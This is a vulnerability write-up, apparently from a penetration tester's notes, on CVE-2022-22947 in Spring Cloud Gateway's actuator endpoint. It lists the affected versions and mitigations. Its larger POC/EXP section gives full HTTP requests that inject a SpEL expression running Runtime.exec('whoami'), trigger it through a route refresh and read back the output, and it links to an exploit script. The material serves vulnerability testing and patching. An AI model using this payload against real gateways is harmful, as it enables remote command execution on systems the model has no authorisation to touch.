Principle
When the Gateway Actuator endpoint is enabled and exposed (it is off by default and has to be enabled and included in the web exposure list explicitly), an attacker can submit a route definition whose filter or predicate arguments carry a malicious SpEL expression. When the routes are refreshed, the gateway evaluates those arguments as SpEL in an unrestricted evaluation context, so the expression can call arbitrary Java classes and methods, which leads to remote code execution (CVE-2022-22947).
Reference article:
https://blog.csdn.net/m0_61506558/article/details/126914956
Affected versions
Spring Cloud Gateway 3.1.x < 3.1.1
Spring Cloud Gateway 3.0.x < 3.0.7
Spring Cloud Gateway 2.x and other older, unsupported versions
Impact
A remote attacker who can reach the exposed actuator endpoint can send crafted requests and execute arbitrary commands on the host running the gateway. Mitigation: upgrade to 3.1.1 / 3.0.7 or later; if the gateway endpoint is not needed, disable it (management.endpoint.gateway.enabled=false) and leave it out of management.endpoints.web.exposure.include; in any case, never expose actuator endpoints to untrusted networks.
POC & EXP
Manual
# 1. Request http://x.x.x.x:x/actuator and confirm the actuator is reachable and the response lists gateway links (/actuator/gateway/...)
# 2. Create a new route whose filter argument carries the malicious SpEL expression; the response status should be 201 Created
POST /actuator/gateway/routes/test HTTP/1.1
Host: x.x.x.x:x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type:application/json
Content-Length: 298
{"id": "test","filters": [{"name": "AddResponseHeader","args": {"value":"#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}","name": "cmd"}}],"uri": "http://example.com:80","order": 0 }
# 3. Refresh the route table (this is what triggers evaluation of the SpEL expression; the refresh endpoint takes no parameters, so the body below is irrelevant and an empty POST works too)
POST /actuator/gateway/refresh HTTP/1.1
Host: x.x.x.x:x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
a=1
# 4. Read back the route just created: GET http://x.x.x.x:x/actuator/gateway/routes/test. The filter's value argument in the response now contains the command output (e.g. cmd = 'root'). After testing, clean up: DELETE /actuator/gateway/routes/test, then POST /actuator/gateway/refresh again so the malicious route is gone.
Script
https://github.com/lucksec/Spring-Cloud-Gateway-CVE-2022-22947